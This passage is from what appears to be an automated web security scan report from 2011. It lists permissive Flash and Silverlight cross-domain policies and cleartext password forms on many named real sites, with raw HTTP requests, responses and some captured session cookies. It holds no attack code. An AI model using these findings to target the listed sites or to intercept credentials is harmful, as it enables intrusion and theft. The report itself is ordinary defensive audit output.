<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

8.111. http://www.wretch.cc/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wretch.cc
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wretch.cc

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 17:24:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=5184000
Expires: Sun, 26 Jun 2011 17:24:11 GMT
Last-Modified: Fri, 22 Apr 2011 11:40:10 GMT
Accept-Ranges: bytes
Content-Length: 339
Vary: Accept-Encoding
Content-Type: application/xml
Age: 372381
Via: HTTP/1.1 r4.ycpi.tp2.yahoo.net (YahooTrafficServer/1.19.5 [cHs f ])
Server: YTS/1.19.5

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*.wretch.cc" />
<allow-access-from domain="*.yahoo.com" />
...[SNIP]...

8.112. http://www.youneek.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youneek.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youneek.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:34 GMT
Server: Apache
Content-Length: 224
Cache-Control: public;max-age=86400
Expires: Tue, 03 May 2011 00:20:34 GMT
Last-Modified: Thu, 21 Apr 2011 00:10:23 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.YourSiteDomain.com" />
...[SNIP]...

8.113. http://www.argosy.edu/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.argosy.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.argosy.edu

Response

HTTP/1.1 200 OK
Content-Length: 272
Content-Type: text/xml
Last-Modified: Thu, 13 Oct 2005 14:41:11 GMT
Accept-Ranges: bytes
ETag: "809d6f274d0c51:fc87"
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.pointroll.com" />
<allow-access-from domain="pointroll.com" />
...[SNIP]...

8.114. http://www.babybottlepop.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babybottlepop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babybottlepop.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:23:03 GMT
Server: Apache
Content-Type: text/xml
Last-Modified: Fri, 14 Jan 2011 01:42:18 GMT
ETag: "1bf8022-216-499c48b62f280"
Accept-Ranges: bytes
Age: 0
Via: HTTP/1.1 www.babybottlepop.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Sun, 06 Mar 2011 12:20:26 GMT
Warning: 110 dfw107021 "Response is stale" "Mon, 02 May 2011 00:23:03 GMT"
Via: 1.1 dfw107021 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 534
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <!-- <allow-access-from domain="*"/> -->
   <allow-access-from domain="origin.babybottlepop.com" />
...[SNIP]...
<allow-access-from domain="cache.babybottlepop.com" />
   <allow-access-from domain="babybottlepop.com" />
   <allow-access-from domain="68.170.132.138" />
   <allow-access-from domain="wrpx2.service.mirror-image.net" />
...[SNIP]...

8.115. http://www.bluesplayer.co.uk/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluesplayer.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bluesplayer.co.uk

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:10:50 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "fc-4cbc1bc5-0"
Last-Modified: Mon, 18 Oct 2010 10:04:53 GMT
Content-Type: application/xml
Content-Length: 252

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="x.mochiads.com"/>
<allow-access-from domain="www.mochiads.com"/>
<allow-access-from domain="www.mochimedia.com"/>
...[SNIP]...

8.116. http://www.hotwheelscollectors.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hotwheelscollectors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:00 GMT
Server: MII-WSD/1.4
Last-Modified: Fri, 14 May 2010 21:03:32 GMT
Accept-Ranges: bytes
ETag: "2d905e9a8f3ca1:4a7"
X-Powered-By: ASP.NET
Age: 0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 02 May 2011 02:14:00 GMT
Cache-Control: max-age=10800
Content-Type: text/xml
Content-Length: 439
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="mbws.mattel.com" />
<allow-access-from domain="estwr-25-90.corp.mattel.com" />
<allow-access-from domain="battleforce5.com" />
<allow-access-from domain="dev.battleforce5.net" />
<allow-access-from domain="dev.mattel.net" />
...[SNIP]...

8.117. http://www.mdconsult.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mdconsult.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mdconsult.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Date: Mon, 02 May 2011 00:11:14 GMT
P3P: CP="ALL CURa DEVa TAIa OUR IND PHY ONL UNI PUR DEM STA"
Content-type: text/xml
Last-modified: Sun, 09 May 2010 07:53:54 GMT
Content-length: 221
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="mdconsult.stepchanger.com" />
<
...[SNIP]...

8.118. http://www.oshkoshbgosh.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkoshbgosh.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oshkoshbgosh.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:36 GMT
Server: Apache
Content-Length: 277
Cache-Control: public;max-age=85410
Expires: Tue, 03 May 2011 00:28:06 GMT
Last-Modified: Fri, 29 Apr 2011 02:05:53 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="demandware.edgesuite.net" />
<allow-access-from domain="carters.com" />
...[SNIP]...

8.119. http://www.ourmidland.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourmidland.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ourmidland.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2081380
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:14:48 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0379
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: ourmidland.com
X-TNCMS-Served-By: cmsapp14
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

8.120. http://www.recordslogin.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recordslogin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.recordslogin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 21 Jan 2009 05:20:53 GMT
ETag: "410131-7d-460f751d5d740"
Accept-Ranges: bytes
Content-Length: 125
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.gov-records.com" />
</cross-domain-policy>


8.121. http://www.reelseo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reelseo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reelseo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:56 GMT
Server: Apache
Last-Modified: Tue, 29 Jun 2010 04:58:59 GMT
ETag: "116-48a24185c4ac0"
Accept-Ranges: bytes
Content-Length: 278
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Mon, 02 May 2011 01:37:56 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!-- http://media.reelseo.com/player/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.reelseo.com" />
<allow-access-from domain="media.reelseo.com" />
<allow-access-from domain="audio.reelseo.com" />
...[SNIP]...

8.122. http://www.slotocash.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slotocash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slotocash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:36 GMT
Server: Apache
Last-Modified: Wed, 01 Oct 2008 16:25:41 GMT
Accept-Ranges: bytes
Content-Length: 325
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="get.slotocash.com" />
<allow-access-from domain="slotocash.com" />
...[SNIP]...

8.123. http://www.solidworks.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.solidworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.solidworks.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Location: http://www.solidworks.com/crossdomain.xml
Last-Modified: Mon, 14 Sep 2009 20:51:00 GMT
ETag: "7ed6cb107d35ca1:c1f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Date: Sun, 01 May 2011 23:45:10 GMT
Content-Length: 397
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://files.solidworks.com" />
<allow-access-from domain="files.solidworks.com" />
<allow-access-from domain="www.romercreative.com" />
<allow-access-from domain="romercreative.com" />
...[SNIP]...

8.124. http://www.undisciplined-subs.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.undisciplined-subs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.undisciplined-subs.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:51 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.7e
Last-Modified: Fri, 16 Jan 2009 16:15:17 GMT
ETag: "17f61e8-d0-4970b295"
Accept-Ranges: bytes
Content-Length: 208
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy>
<allow-access-from domain="members.burningticket.com" secure="true" />
</cross-domain
...[SNIP]...

8.125. http://www.uni.edu/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uni.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.uni.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:45 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 18:52:21 GMT
ETag: "c002-1c4-4a0d14f024340"
Accept-Ranges: bytes
Content-Length: 452
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.uni.edu"/>
<allow-access-from domain="live.uni.edu"/>
<allow-access-from domain="media22.uni.edu"/>
<allow-access-from domain="wwwstage.uni.edu"/>
<allow-access-from domain="wwwdev.uni.edu"/>
<allow-access-from domain="drupal-lab.its-ns.uni.edu"/>
...[SNIP]...

8.126. http://www.voiceofsandiego.org/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.voiceofsandiego.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.voiceofsandiego.org

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2088212
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:53:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0367
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: voiceofsandiego.org
X-TNCMS-Served-By: cmsapp15
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

8.127. http://www.walthers.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walthers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.walthers.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:06 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 21:04:04 GMT
ETag: "1c083fe-105-49d21ab85d900"
Accept-Ranges: bytes
Content-Length: 261
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.walthers.com" />
   <allow-access-from domain="walthers.com" />
...[SNIP]...

9. Silverlight cross-domain policy
There are 6 instances of this issue:


9.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 01 May 2011 23:33:33 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

9.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 02 May 2011 23:34:41 GMT
Date: Sun, 01 May 2011 23:34:41 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

9.3. http://metrics.washingtonpost.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.washingtonpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
xserver: www53
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

9.4. http://n4403ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://n4403ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: n4403ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 02 May 2011 01:58:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

9.5. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 01 May 2011 06:39:14 GMT
Expires: Mon, 02 May 2011 06:39:14 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 60917

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

9.6. http://view.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: view.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Mon, 02 May 2011 02:20:10 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

10. Cleartext submission of password
There are 10 instances of this issue:


10.1. http://insurancenewsnet.com/article.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
<!-- end Tooltips -->
<form name="aspnetForm" method="post" action="article.aspx?id=257992" id="aspnetForm">
<div>
...[SNIP]...
<p style="padding:0px 5px; margin-bottom:0;">Password: <input name="ctl00$Template_navigation$txtLoginPassword" type="password" id="ctl00_Template_navigation_txtLoginPassword" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)) {__doPostBack('ctl00$Template_navigation$btnLoginUser', '');return false;}} else {return true}; " style="width:115px;" /></p>
...[SNIP]...

10.2. http://www.greenhulk.net/forums/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
